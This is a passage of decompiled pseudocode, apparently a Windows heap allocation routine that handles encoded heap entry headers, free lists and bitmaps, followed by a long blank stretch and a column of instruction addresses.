																					} else {
																						_t1617 = _v68;
																					}
																					_t1785 = _v40;
																				}
																				_t1619 = _v48 - (_t1617 & 0x0000ffff);
																				_v324 = _t1619;
																				__eflags = _t1619;
																				if(_t1619 > 0) {
																					_t1895 = _t1785;
																					L116:
																					_t1604 = _v36;
																				} else {
																					_t1323 =  *_t1785 + 0xfffffff8;
																					_v32 = _t1323;
																					_t1324 =  *_t1323;
																					_v420 = _t1324;
																					_t1620 = _t1324 & 0x0000ffff;
																					__eflags =  *(_t1871 + 0x4c);
																					if( *(_t1871 + 0x4c) != 0) {
																						_t1795 =  *(_t1871 + 0x50) ^ _t1324;
																						_v420 = _t1795;
																						_t1358 = _t1795 & 0x0000ffff;
																						_v44 = _t1358;
																						_v68 = _t1358 & 0x0000ffff;
																						_t1643 = _t1795 >> 0x00000010 ^ _t1795 >> 0x00000008 ^ _t1795;
																						__eflags = _t1795 >> 0x18 - _t1643;
																						if(_t1795 >> 0x18 != _t1643) {
																							_push(_t1643);
																							L0185A80D(_t1871, _v32, 0, 0);
																							_t1620 = _v44 & 0x0000ffff;
																						} else {
																							_t1620 = _v68;
																						}
																						_t1785 = _v40;
																					}
																					_t1622 = _v48 - (_t1620 & 0x0000ffff);
																					_v328 = _t1622;
																					__eflags = _t1622;
																					_t1604 = _v36;
																					if(_t1622 <= 0) {
																						_t1895 =  *_t1785;
																						L117:
																						__eflags = _t1895;
																						if(_t1895 == 0) {
																							L211:
																							_t1604 =  *_t1604;
																							_v36 = _t1604;
																							_t1316 =  *(_t1604 + 0x14);
																							goto L201;
																						}
																						_t1289 = _t1871 + 0xc0;
																						L119:
																						_t1605 = _v48;
																						while(1) {
																							__eflags = _t1289 - _t1895;
																							if(_t1289 == _t1895) {
																								break;
																							}
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) == 0) {
																								_t1768 =  *(_t1895 - 8);
																							} else {
																								_t1768 =  *(_t1895 - 8);
																								_v164 = _t1768;
																								__eflags =  *(_t1871 + 0x4c) & _t1768;
																								if(( *(_t1871 + 0x4c) & _t1768) != 0) {
																									_t1768 = _t1768 ^  *(_t1871 + 0x50);
																									__eflags = _t1768;
																									_v164 = _t1768;
																								}
																							}
																							_v166 = _t1768;
																							__eflags = _t1605 - (_t1768 & 0x0000ffff);
																							if(_t1605 <= (_t1768 & 0x0000ffff)) {
																								break;
																							} else {
																								_t1895 =  *_t1895;
																								_t1289 = _t1871 + 0xc0;
																								continue;
																							}
																						}
																						_t283 = _t1518 + 8; // 0x8
																						_t1291 = _t283;
																						_t1606 =  *(_t1895 + 4);
																						_t1769 =  *_t1606;
																						__eflags = _t1769 - _t1895;
																						if(_t1769 != _t1895) {
																							_push(_t1606);
																							L0185A80D(0, _t1895, 0, _t1769);
																						} else {
																							 *_t1291 = _t1895;
																							_t1291[1] = _t1606;
																							 *_t1606 = _t1291;
																							 *(_t1895 + 4) = _t1291;
																						}
																						 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																						_t1608 =  *(_t1871 + 0xb4);
																						_v48 = _t1608;
																						__eflags = _t1608;
																						if(_t1608 == 0) {
																							goto L134;
																						} else {
																							_t1896 =  *_t1518 & 0x0000ffff;
																							while(1) {
																								_t1294 =  *((intOrPtr*)(_t1608 + 4));
																								__eflags = _t1896 - _t1294;
																								if(_t1896 < _t1294) {
																									break;
																								}
																								_t1771 =  *_t1608;
																								__eflags = _t1771;
																								if(_t1771 == 0) {
																									_t1295 = _t1294 - 1;
																									_v256 = _t1295;
																									L127:
																									_v88 = _t1295;
																									_t1773 = _t1295 -  *((intOrPtr*)(_t1608 + 0x14));
																									_v40 = _t1773;
																									__eflags =  *(_t1608 + 8);
																									if( *(_t1608 + 8) != 0) {
																										_v36 = _t1773 + _t1773;
																									} else {
																										_v36 = _t1773;
																									}
																									 *((intOrPtr*)(_t1608 + 0xc)) =  *((intOrPtr*)(_t1608 + 0xc)) + 1;
																									_v128 =  *( *((intOrPtr*)(_t1608 + 0x20)) + _v36 * 4);
																									__eflags = _v88 -  *((intOrPtr*)(_t1608 + 4)) - 1;
																									_t1775 = _v40;
																									if(_v88 ==  *((intOrPtr*)(_t1608 + 4)) - 1) {
																										 *((intOrPtr*)(_t1608 + 0x10)) =  *((intOrPtr*)(_t1608 + 0x10)) + 1;
																									}
																									_t1301 = _v128;
																									__eflags = _t1301;
																									if(_t1301 != 0) {
																										_t1302 = _t1301 + 0xfffffff8;
																										_v32 = _t1302;
																										_t1303 =  *_t1302;
																										_v436 = _t1303;
																										_v64 = _t1303 & 0x0000ffff;
																										__eflags =  *(_t1871 + 0x4c);
																										_t1775 = _v40;
																										if( *(_t1871 + 0x4c) != 0) {
																											_t1781 =  *(_t1871 + 0x50) ^ _t1303;
																											_v436 = _t1781;
																											_t1309 = _t1781 & 0x0000ffff;
																											_v44 = _t1309;
																											_v64 = _t1309 & 0x0000ffff;
																											_t1614 = _t1781 >> 0x00000010 ^ _t1781 >> 0x00000008 ^ _t1781;
																											__eflags = _t1781 >> 0x18 - _t1614;
																											if(_t1781 >> 0x18 != _t1614) {
																												_push(_t1614);
																												L0185A80D(_t1871, _v32, 0, 0);
																												_v64 = _v44 & 0x0000ffff;
																											}
																											_t1775 = _v40;
																											_t1608 = _v48;
																										}
																										_t1897 = _t1896 - (_v64 & 0x0000ffff);
																										_v336 = _t1897;
																										__eflags = _t1897;
																										if(_t1897 <= 0) {
																											goto L131;
																										} else {
																											goto L132;
																										}
																									} else {
																										L131:
																										_t310 = _t1518 + 8; // 0x8
																										 *( *((intOrPtr*)(_t1608 + 0x20)) + _v36 * 4) = _t310;
																										L132:
																										__eflags = _v128;
																										if(_v128 == 0) {
																											_t1900 = _t1775 >> 5;
																											_v40 = _t1775 & 0x0000001f;
																											_t318 = _v48 + 0x1c; // 0xffffbba0
																											_t1308 =  *_t318;
																											_t319 = _t1308 + _t1900 * 4;
																											 *_t319 =  *(_t1308 + _t1900 * 4) | 0x00000001 << _v40;
																											__eflags =  *_t319;
																										}
																										goto L134;
																									}
																								}
																								_t1608 = _t1771;
																								_v48 = _t1608;
																							}
																							_v256 = _t1896;
																							_t1295 = _t1896;
																							goto L127;
																						}
																					}
																					__eflags =  *_t1604;
																					if( *_t1604 == 0) {
																						__eflags = _v64 -  *((intOrPtr*)(_t1604 + 4)) - 1;
																						if(_v64 !=  *((intOrPtr*)(_t1604 + 4)) - 1) {
																							goto L107;
																						}
																						__eflags =  *(_t1604 + 8);
																						if( *(_t1604 + 8) != 0) {
																							_v52 = _v52 + _v52;
																						}
																						_t1347 =  *((intOrPtr*)( *((intOrPtr*)(_t1604 + 0x20)) + _v52 * 4));
																						while(1) {
																							_v64 = _t1347;
																							__eflags = _t1785 - _t1347;
																							if(_t1785 == _t1347) {
																								goto L116;
																							}
																							_t1348 = _t1347 + 0xfffffff8;
																							_v32 = _t1348;
																							_t1349 =  *_t1348;
																							_v428 = _t1349;
																							_t1632 = _t1349 & 0x0000ffff;
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) != 0) {
																								_t1791 =  *(_t1871 + 0x50) ^ _t1349;
																								_v428 = _t1791;
																								_t1352 = _t1791 & 0x0000ffff;
																								_v44 = _t1352;
																								_v68 = _t1352 & 0x0000ffff;
																								_t1638 = _t1791 >> 0x00000010 ^ _t1791 >> 0x00000008 ^ _t1791;
																								__eflags = _t1791 >> 0x18 - _t1638;
																								if(_t1791 >> 0x18 != _t1638) {
																									_push(_t1638);
																									L0185A80D(_t1871, _v32, 0, 0);
																									_t1632 = _v44 & 0x0000ffff;
																								} else {
																									_t1632 = _v68;
																								}
																								_t1785 = _v40;
																							}
																							_t1634 = _v48 - (_t1632 & 0x0000ffff);
																							_v332 = _t1634;
																							__eflags = _t1634;
																							if(_t1634 > 0) {
																								_t1347 =  *_v64;
																								continue;
																							} else {
																								_t1895 = _v64;
																								_t1604 = _v36;
																								goto L117;
																							}
																						}
																						goto L116;
																					}
																					L107:
																					_t1787 = _v52 >> 5;
																					_v44 = ( *((intOrPtr*)(_t1604 + 4)) -  *(_t1604 + 0x14) >> 5) - 1;
																					_t1333 =  *((intOrPtr*)(_t1604 + 0x1c)) + _t1787 * 4;
																					_v32 = 1;
																					_t1628 =  !((1 << (_v52 & 0x0000001f)) - 1) &  *_t1333;
																					__eflags = _t1628;
																					_t1904 = _v44;
																					while(1) {
																						_v252 = _t1333;
																						_v188 = _t1787;
																						__eflags = _t1628;
																						if(_t1628 != 0) {
																							break;
																						}
																						__eflags = _t1787 - _t1904;
																						if(_t1787 > _t1904) {
																							__eflags = _t1628;
																							if(_t1628 != 0) {
																								break;
																							}
																							_t1604 = _v36;
																							goto L211;
																						} else {
																							_t1333 =  &(_t1333[1]);
																							_t1628 =  *_t1333;
																							_t1787 = _t1787 + 1;
																							continue;
																						}
																					}
																					__eflags = _t1628;
																					if(_t1628 == 0) {
																						_t1336 = _t1628 >> 0x00000010 & 0x000000ff;
																						__eflags = _t1336;
																						if(_t1336 != 0) {
																							_t1338 = ( *(_t1336 + 0x17784d0) & 0x000000ff) + 0x10;
																						} else {
																							_t1338 = ( *((_t1628 >> 0x18) + 0x17784d0) & 0x000000ff) + 0x18;
																						}
																					} else {
																						_t1341 = _t1628 & 0x000000ff;
																						__eflags = _t1628;
																						if(_t1628 == 0) {
																							_t1338 = ( *((_t1628 >> 0x00000008 & 0x000000ff) + 0x17784d0) & 0x000000ff) + 8;
																						} else {
																							_t1338 =  *(_t1341 + 0x17784d0) & 0x000000ff;
																						}
																					}
																					_t1789 = (_t1787 << 5) + _t1338;
																					_v188 = _t1789;
																					_t1604 = _v36;
																					__eflags =  *(_t1604 + 8);
																					if( *(_t1604 + 8) != 0) {
																						_t1789 = _t1789 + _t1789;
																					}
																					_t1895 =  *( *((intOrPtr*)(_t1604 + 0x20)) + _t1789 * 4);
																				}
																			}
																			goto L117;
																		}
																	}
																}
															}
															_t1654 =  *_t1518 & 0x0000ffff;
															while(1) {
																_t550 = _t1740 + 4; // 0x0
																_t1384 =  *_t550;
																__eflags = _t1654 - _t1384;
																if(_t1654 < _t1384) {
																	break;
																}
																_t1906 =  *_t1740;
																_v44 = _t1906;
																__eflags = _t1906;
																_t1883 = _v32;
																if(_t1906 == 0) {
																	_t1654 = _t1384 - 1;
																	break;
																}
																_t1740 = _v44;
															}
															_v240 = _t1654;
															_t556 = _t1518 + 8; // 0x8
															E017BBC04(_t1871, _t1740, 1, _t556, _t1654,  *_t1518 & 0x0000ffff);
															_t1567 = _v88;
															goto L258;
														}
														_t1518 = _t1882 - 8;
														_v100 = _t1518;
														__eflags =  *(_t1871 + 0x4c);
														if( *(_t1871 + 0x4c) != 0) {
															 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
															__eflags =  *(_t1518 + 3) - ( *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518);
															if(__eflags != 0) {
																_push(_t1564);
																L0184FA2B(_t1518, _t1871, _t1518, _t1871, _t1882, __eflags);
															}
														}
														_t1656 =  *_t1518 & 0x0000ffff;
														__eflags = _t1656 - _v52;
														if(_t1656 < _v52) {
															__eflags =  *(_t1871 + 0x4c);
															if( *(_t1871 + 0x4c) != 0) {
																 *(_t1518 + 3) =  *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518;
																 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
															}
															goto L248;
														}
														_t115 = _t1518 + 8; // 0x8
														_t1392 = _t115;
														_v44 = _t1392;
														_t1393 =  *_t1392;
														_v160 = _t1393;
														_t1820 =  *(_t1518 + 0xc);
														_v152 = _t1820;
														_t1821 =  *_t1820;
														_t1907 =  *((intOrPtr*)(_t1393 + 4));
														__eflags = _t1821 - _t1907;
														if(_t1821 != _t1907) {
															L440:
															_push(_t1656);
															_t858 = _t1518 + 8; // 0x8
															_t1546 = 0xd;
															_t1074 = L0185A80D(_t1871, _t858, _t1907, _t1821);
															_v70 = 0;
															goto L153;
														}
														_t121 = _t1518 + 8; // 0x8
														__eflags = _t1821 - _t121;
														if(_t1821 != _t121) {
															goto L440;
														}
														 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - _t1656;
														_t1657 =  *(_t1871 + 0xb4);
														_v36 = _t1657;
														__eflags = _t1657;
														if(_t1657 == 0) {
															L74:
															_t1396 = _v160;
															_t1658 = _v152;
															 *_t1658 = _t1396;
															 *(_t1396 + 4) = _t1658;
															__eflags =  *(_t1518 + 2) & 0x00000008;
															if(( *(_t1518 + 2) & 0x00000008) != 0) {
																_t1397 = E017BA229(_t1871, _t1518);
																__eflags = _t1397;
																if(_t1397 != 0) {
																	goto L75;
																}
																_t1546 = _t1871;
																_t1074 = E017BA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
																_v70 = 0;
																goto L153;
															}
															L75:
															_v70 = 1;
															goto L76;
														} else {
															_t1825 =  *_t1518 & 0x0000ffff;
															while(1) {
																_t1399 =  *((intOrPtr*)(_t1657 + 4));
																__eflags = _t1825 - _t1399;
																if(_t1825 < _t1399) {
																	break;
																}
																_t1908 =  *_t1657;
																__eflags = _t1908;
																if(_t1908 == 0) {
																	_t1825 = _t1399 - 1;
																	break;
																} else {
																	_t1657 = _t1908;
																	_v36 = _t1657;
																	continue;
																}
															}
															_v232 = _t1825;
															_v108 =  *_t1518 & 0x0000ffff;
															_t1910 = _t1825 -  *((intOrPtr*)(_t1657 + 0x14));
															_v40 = _t1910;
															__eflags =  *(_t1657 + 8);
															if( *(_t1657 + 8) != 0) {
																_t1401 = _t1910 + _t1910;
															} else {
																_t1401 = _t1910;
															}
															_t1911 = _t1401 * 4;
															_v88 = _t1911;
															_t1403 =  *((intOrPtr*)(_t1657 + 0x20)) + _t1911;
															_v128 = _t1403;
															_v32 =  *_t1403;
															 *((intOrPtr*)(_t1657 + 0xc)) =  *((intOrPtr*)(_t1657 + 0xc)) - 1;
															_t1405 =  *((intOrPtr*)(_t1657 + 4));
															_t1912 = _t1405 - 1;
															_v68 = _t1912;
															__eflags = _t1825 - _t1912;
															if(_t1825 == _t1912) {
																 *((intOrPtr*)(_t1657 + 0x10)) =  *((intOrPtr*)(_t1657 + 0x10)) - 1;
															}
															__eflags = _v32 - _v44;
															if(_v32 != _v44) {
																goto L74;
															} else {
																_v236 = _t1405;
																__eflags =  *_t1657;
																if( *_t1657 == 0) {
																	_t1405 = _v68;
																	_v236 = _t1405;
																}
																_v48 =  *(_t1518 + 8);
																_v32 =  *((intOrPtr*)(_t1657 + 0x18));
																__eflags = _t1825 - _t1405;
																_t1916 = _v40;
																if(_t1825 >= _t1405) {
																	_t1406 = _v48;
																	_t1660 = _v128;
																	__eflags = _t1406 - _v32;
																	if(_t1406 != _v32) {
																		 *_t1660 = _t1406;
																		goto L74;
																	}
																	 *_t1660 = 0;
																	L73:
																	_t1917 = _t1916 >> 5;
																	_t1408 =  *((intOrPtr*)(_v36 + 0x1c));
																	_t172 = _t1408 + _t1917 * 4;
																	 *_t172 =  *(_t1408 + _t1917 * 4) &  !(1 << (_v40 & 0x0000001f));
																	__eflags =  *_t172;
																	goto L74;
																}
																_t1829 = _v48;
																__eflags = _t1829 -  *((intOrPtr*)(_t1657 + 0x18));
																if(_t1829 ==  *((intOrPtr*)(_t1657 + 0x18))) {
																	L72:
																	 *(_v88 +  *((intOrPtr*)(_t1657 + 0x20))) = 0;
																	goto L73;
																}
																_t1410 = _t1829 - 8;
																_v32 = _t1410;
																_t1411 =  *_t1410;
																_v404 = _t1411;
																_t1527 = _t1411 & 0x0000ffff;
																__eflags =  *(_t1871 + 0x4c);
																if( *(_t1871 + 0x4c) != 0) {
																	_t1831 =  *(_t1871 + 0x50) ^ _t1411;
																	_v404 = _t1831;
																	_t1414 = _t1831 & 0x0000ffff;
																	_v44 = _t1414;
																	_t1527 = _t1414 & 0x0000ffff;
																	_t1668 = _t1831 >> 0x00000010 ^ _t1831 >> 0x00000008 ^ _t1831;
																	__eflags = _t1831 >> 0x18 - _t1668;
																	if(_t1831 >> 0x18 != _t1668) {
																		_push(_t1668);
																		L0185A80D(_t1871, _v32, 0, 0);
																		_t1527 = _v44 & 0x0000ffff;
																	}
																	_t1829 = _v48;
																	_t1657 = _v36;
																}
																_t1529 = _v108 - (_t1527 & 0x0000ffff);
																__eflags = _t1529;
																_v316 = _t1529;
																if(_t1529 == 0) {
																	 *(_v88 +  *((intOrPtr*)(_t1657 + 0x20))) = _t1829;
																	_t1518 = _v100;
																	goto L74;
																} else {
																	_t1518 = _v100;
																	goto L72;
																}
															}
														}
													}
												}
											}
											L311:
											_t1882 = _t1736;
											goto L49;
										}
									}
									_t1564 = _t1147;
									_v36 = _t1147;
								}
								goto L26;
							}
							_t1922 =  *_t1145;
							if(_t1922 != 0) {
								_t1518 = _t1922 - 8;
								_v100 = _t1518;
								__eflags =  *(_t1871 + 0x4c);
								if( *(_t1871 + 0x4c) != 0) {
									 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
									__eflags =  *(_t1518 + 3) - ( *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518);
									if(__eflags != 0) {
										_push(_t1546);
										L0184FA2B(_t1518, _t1871, _t1518, _t1871, _t1922, __eflags);
									}
								}
								_t460 = _t1518 + 8; // 0xddeeddf6
								_t1459 = _t460;
								_v160 = _t1459;
								_t1707 =  *_t1459;
								_v44 = _t1707;
								_t1460 =  *(_t1518 + 0xc);
								_v32 = _t1460;
								_t1461 =  *_t1460;
								_t1708 =  *((intOrPtr*)(_t1707 + 4));
								__eflags = _t1461 - _t1708;
								if(_t1461 != _t1708) {
									L429:
									_push(_t1708);
									_t1546 = 0xd;
									L0185A80D(_t1871, _t1922, _t1708, _t1461);
									goto L430;
								} else {
									__eflags = _t1461 - _t1922;
									if(_t1461 != _t1922) {
										goto L429;
									}
									 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1518 & 0x0000ffff);
									_t1709 =  *(_t1871 + 0xb4);
									_v36 = _t1709;
									__eflags = _t1709;
									if(_t1709 == 0) {
										L235:
										_t1465 = _v44;
										_t1710 = _v32;
										 *_t1710 = _t1465;
										 *(_t1465 + 4) = _t1710;
										__eflags =  *(_t1518 + 2) & 0x00000008;
										if(( *(_t1518 + 2) & 0x00000008) != 0) {
											_t1466 = E017BA229(_t1871, _t1518);
											__eflags = _t1466;
											if(_t1466 != 0) {
												goto L236;
											}
											_t1546 = _t1871;
											E017BA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
											L430:
											_v69 = 0;
											 *( *[fs:0x18] + 0xbf4) = 0xc0000017;
											_t1923 =  *[fs:0x18];
											_v296 = _t1923;
											 *((intOrPtr*)(_t1923 + 0x34)) = E0179CCC0(0xc0000017);
											goto L153;
										}
										L236:
										_v69 = 1;
										goto L76;
									}
									_t1852 =  *_t1518 & 0x0000ffff;
									while(1) {
										_t1469 =  *((intOrPtr*)(_t1709 + 4));
										__eflags = _t1852 - _t1469;
										if(_t1852 < _t1469) {
											break;
										}
										_t1924 =  *_t1709;
										__eflags = _t1924;
										if(_t1924 == 0) {
											_t1852 = _t1469 - 1;
											break;
										}
										_t1709 = _t1924;
										_v36 = _t1709;
									}
									_v220 = _t1852;
									_v68 =  *_t1518 & 0x0000ffff;
									_t1926 = _t1852 -  *((intOrPtr*)(_t1709 + 0x14));
									_v40 = _t1926;
									__eflags =  *(_t1709 + 8);
									if( *(_t1709 + 8) != 0) {
										_t1471 = _t1926 + _t1926;
									} else {
										_t1471 = _t1926;
									}
									_t1927 = _t1471 * 4;
									_v128 = _t1927;
									_t1473 =  *((intOrPtr*)(_t1709 + 0x20)) + _t1927;
									_v88 = _t1473;
									_v152 =  *_t1473;
									 *((intOrPtr*)(_t1709 + 0xc)) =  *((intOrPtr*)(_t1709 + 0xc)) - 1;
									_t1475 =  *((intOrPtr*)(_t1709 + 4));
									_v48 = _t1475;
									_t1928 = _t1475 - 1;
									_v108 = _t1928;
									__eflags = _t1852 - _t1928;
									if(_t1852 == _t1928) {
										 *((intOrPtr*)(_t1709 + 0x10)) =  *((intOrPtr*)(_t1709 + 0x10)) - 1;
									}
									__eflags = _v152 - _v160;
									if(_v152 != _v160) {
										goto L235;
									} else {
										_v216 = _t1475;
										__eflags =  *_t1709;
										if( *_t1709 == 0) {
											_t1476 = _v108;
											_v48 = _t1476;
											_v216 = _t1476;
										}
										_t1477 =  *(_t1518 + 8);
										_v152 = _t1477;
										_v108 =  *((intOrPtr*)(_t1709 + 0x18));
										__eflags = _t1852 - _v48;
										_t1931 = _v40;
										if(_t1852 >= _v48) {
											_t1712 = _v88;
											__eflags = _t1477 - _v108;
											if(_t1477 == _v108) {
												 *_t1712 = 0;
												goto L234;
											}
											 *_t1712 = _t1477;
											goto L235;
										} else {
											__eflags = _t1477 -  *((intOrPtr*)(_t1709 + 0x18));
											if(_t1477 ==  *((intOrPtr*)(_t1709 + 0x18))) {
												L233:
												 *(_v128 +  *((intOrPtr*)(_t1709 + 0x20))) = 0;
												L234:
												_t1932 = _t1931 >> 5;
												_t1479 =  *((intOrPtr*)(_v36 + 0x1c));
												_t513 = _t1479 + _t1932 * 4;
												 *_t513 =  *(_t1479 + _t1932 * 4) &  !(1 << (_v40 & 0x0000001f));
												__eflags =  *_t513;
												goto L235;
											}
											_t1481 = _t1477 + 0xfffffff8;
											_v108 = _t1481;
											_t1482 =  *_t1481;
											_v372 = _t1482;
											_t1539 = _t1482 & 0x0000ffff;
											__eflags =  *(_t1871 + 0x4c);
											if( *(_t1871 + 0x4c) != 0) {
												_t1861 =  *(_t1871 + 0x50) ^ _t1482;
												_v372 = _t1861;
												_t1485 = _t1861 & 0x0000ffff;
												_v160 = _t1485;
												_t1539 = _t1485 & 0x0000ffff;
												_t1719 = _t1861 >> 0x00000010 ^ _t1861 >> 0x00000008 ^ _t1861;
												__eflags = _t1861 >> 0x18 - _t1719;
												if(_t1861 >> 0x18 != _t1719) {
													_push(_t1719);
													L0185A80D(_t1871, _v108, 0, 0);
													_t1539 = _v160 & 0x0000ffff;
												}
												_t1709 = _v36;
											}
											_t1858 = _v68 - (_t1539 & 0x0000ffff);
											__eflags = _t1858;
											_v292 = _t1858;
											if(_t1858 == 0) {
												 *(_v128 +  *((intOrPtr*)(_t1709 + 0x20))) = _v152;
												_t1518 = _v100;
												goto L235;
											} else {
												_t1518 = _v100;
												goto L233;
											}
										}
									}
								}
							}
							goto L23;
						}
						_t1496 = _a4;
						if(_t1518 >= ( *(_t1871 + 0xe0) & 0x0000ffff)) {
							__eflags = _t1496 -  *0x1885cb4; // 0x4000
							if(__eflags > 0) {
								goto L21;
							}
							__eflags =  *((char*)(_t1871 + 0xda)) - 2;
							if( *((char*)(_t1871 + 0xda)) == 2) {
								__eflags =  *(_t1871 + 0xd4);
								if( *(_t1871 + 0xd4) != 0) {
									goto L21;
								}
							}
							__eflags =  *((char*)(_t1871 + 0xdb)) - 2;
							if( *((char*)(_t1871 + 0xdb)) == 2) {
								 *(_t1871 + 0x48) =  *(_t1871 + 0x48) | 0x20000000;
							}
							goto L21;
						}
						_t1952 = _t1496 -  *0x1885cb4; // 0x4000
						if(_t1952 > 0) {
							goto L21;
						}
						_t1723 = _t1871 + 0xe2 + (_t1518 >> 3);
						_v88 = _t1723;
						_t1546 = _t1518 & 7;
						_v128 = _t1546;
						if(( *_t1723 & 0x00000001 << _t1546) != 0) {
							L20:
							_t1729 = _v52;
							goto L21;
						}
						_t1933 =  *((intOrPtr*)(_t1871 + 0xdc)) + _t1518 * 2;
						_v288 = _t1933;
						 *_t1933 =  *_t1933 + 0x21;
						_t1546 =  *_t1933;
						if(_v180 != 0) {
							L275:
							_t1504 = _a4;
							__eflags = _t1504;
							if(_t1504 == 0) {
								_t1866 = 1;
							} else {
								_t1866 = _t1504;
							}
							__eflags =  *((char*)(_t1871 + 0xda)) - 2;
							if( *((char*)(_t1871 + 0xda)) != 2) {
								_t1724 = 0;
							} else {
								_t1724 =  *(_t1871 + 0xd4);
							}
							_t1506 = E017CF4A7(_t1724, _t1866) & 0x0000ffff;
							_t1546 = 0xffff;
							__eflags = _t1506 - 0xffff;
							if(_t1506 == 0xffff) {
								__eflags =  *((char*)(_t1871 + 0xda)) - 2;
								if( *((char*)(_t1871 + 0xda)) == 2) {
									__eflags =  *(_t1871 + 0xd4);
									if( *(_t1871 + 0xd4) != 0) {
										goto L20;
									}
								}
								 *(_t1871 + 0x48) =  *(_t1871 + 0x48) | 0x20000000;
							} else {
								 *_t1933 = _t1506;
								_t1546 = _v88;
								asm("bts eax, edx");
								 *_t1546 =  *_t1546 & 0x000000ff;
								 *((intOrPtr*)(_t1871 + 0x22c)) =  *((intOrPtr*)(_t1871 + 0x22c)) + 1;
							}
							goto L20;
						}
						if((_t1546 & 0x0000001f) > 0x10 || _t1546 > 0xff00) {
							_v212 = 1;
							goto L275;
						} else {
							_v212 = 0;
							goto L20;
						}
					} else {
						_t1546 =  *(_t1871 + 0xc8);
						_t1868 =  *[fs:0x18];
						asm("lock btr dword [eax], 0x0");
						if(_t1946 >= 0) {
							_t1074 =  *(_t1546 + 0xc);
							__eflags =  *(_t1546 + 0xc) -  *(_t1868 + 0x24);
							if( *(_t1546 + 0xc) ==  *(_t1868 + 0x24)) {
								 *(_t1546 + 8) =  *(_t1546 + 8) + 1;
								goto L8;
							}
							_v176 = 0;
							__eflags =  *0x1887bc8;
							if( *0x1887bc8 != 0) {
								_v109 = 0;
								 *( *[fs:0x18] + 0xbf4) = 0xc0000194;
								_t1934 =  *[fs:0x18];
								_v284 = _t1934;
								 *((intOrPtr*)(_t1934 + 0x34)) = E0179CCC0(0xc0000194);
								L153:
								_v8 = 0xfffffffe;
								E017B6DF6(_t1074, _t1546, _t1871);
								_t1078 =  *( *[fs:0x30] + 0x50);
								__eflags = _t1078;
								if(_t1078 != 0) {
									__eflags =  *_t1078;
									if( *_t1078 == 0) {
										goto L154;
									}
									_t1079 =  *( *[fs:0x30] + 0x50) + 0x22e;
									L155:
									_t1877 = _v80;
									__eflags =  *_t1079;
									if( *_t1079 != 0) {
										__eflags = _t1877;
										if(_t1877 != 0) {
											_t1730 = _v60;
											__eflags = _t1730;
											if(_t1730 != 0) {
												L0184FEC0(_t1518, _t1871, _t1730 & 0xffff0000,  *((intOrPtr*)(_t1730 + 0x14)));
											}
										}
									}
									_t1073 = _t1877;
									L157:
									 *[fs:0x0] = _v20;
									return _t1073;
								}
								L154:
								_t1079 = 0x7ffe0388;
								goto L155;
							}
							_v180 = 1;
							E017AEEF0( *(_t1871 + 0xc8));
							_t1546 = _t1871;
							_t1074 = E017D4032(_t1546, 1);
							goto L9;
						} else {
							_t1074 =  *(_t1868 + 0x24);
							 *(_t1546 + 0xc) =  *(_t1868 + 0x24);
							 *(_t1546 + 8) = 1;
							L8:
							_v176 = 1;
							 *((intOrPtr*)(_t1871 + 0x204)) =  *((intOrPtr*)(_t1871 + 0x204)) + 1;
							L9:
							_v109 = 1;
							_v53 = 1;
							if(( *(_t1871 + 0x48) & 0x30000000) != 0) {
								_t1546 = _t1871;
								_t1074 = E017C5640(_t1518);
							}
							_t1729 = _v52;
							goto L11;
						}
					}
				}
			}





















































































































































































































































































































































































































                                                          0x017b5600
                                                          0x017b5600
                                                          0x017b5605
                                                          0x017b5607
                                                          0x017b560c
                                                          0x017b5617
                                                          0x017b5618
                                                          0x017b561f
                                                          0x017b5621
                                                          0x017b5626
                                                          0x017b562b
                                                          0x017b562f
                                                          0x017b5635
                                                          0x017b5638
                                                          0x017b563a
                                                          0x017b5640
                                                          0x017b564a
                                                          0x017b5651
                                                          0x017b5655
                                                          0x017b565c
                                                          0x017b5663
                                                          0x017b5670
                                                          0x017b5679
                                                          0x017b672c
                                                          0x017b6736
                                                          0x017b673c
                                                          0x017b673f
                                                          0x017b6744
                                                          0x017febaf
                                                          0x00000000
                                                          0x017febaf
                                                          0x017b674a
                                                          0x017b6750
                                                          0x017febb6
                                                          0x017febbc
                                                          0x00000000
                                                          0x00000000
                                                          0x017febc2
                                                          0x017febc3
                                                          0x00000000
                                                          0x017febc3
                                                          0x017b6756
                                                          0x017b6756
                                                          0x017b6758
                                                          0x017febcd
                                                          0x017febcd
                                                          0x017b6766
                                                          0x017b676c
                                                          0x017b676f
                                                          0x017febd7
                                                          0x017febd7
                                                          0x017b6775
                                                          0x017b6778
                                                          0x017b6783
                                                          0x017b6786
                                                          0x017b6789
                                                          0x017b678e
                                                          0x017febe1
                                                          0x017febe8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6794
                                                          0x017b6794
                                                          0x017b6794
                                                          0x017b6797
                                                          0x017b679a
                                                          0x017b679a
                                                          0x017b679d
                                                          0x017b67a0
                                                          0x017b67a0
                                                          0x017b67a3
                                                          0x00000000
                                                          0x017b67a3
                                                          0x017b568c
                                                          0x017b568c
                                                          0x017b568e
                                                          0x017b5691
                                                          0x017b5693
                                                          0x017b5699
                                                          0x017feb9e
                                                          0x017feba2
                                                          0x017feba7
                                                          0x017feba7
                                                          0x017b56a2
                                                          0x017b56a8
                                                          0x017b56ab
                                                          0x017b56ad
                                                          0x017b56b3
                                                          0x017b64d1
                                                          0x017b64d7
                                                          0x017b64de
                                                          0x017b64e1
                                                          0x017b64e7
                                                          0x017b64ea
                                                          0x017b64ea
                                                          0x017b64e1
                                                          0x017b56b9
                                                          0x017b56c0
                                                          0x017b56c2
                                                          0x017b5714
                                                          0x017b5717
                                                          0x017b69d8
                                                          0x017b69dc
                                                          0x017ff55f
                                                          0x017b6be2
                                                          0x017b6be2
                                                          0x00000000
                                                          0x017b6be2
                                                          0x017b69e5
                                                          0x017b69e8
                                                          0x017b69eb
                                                          0x017b69f8
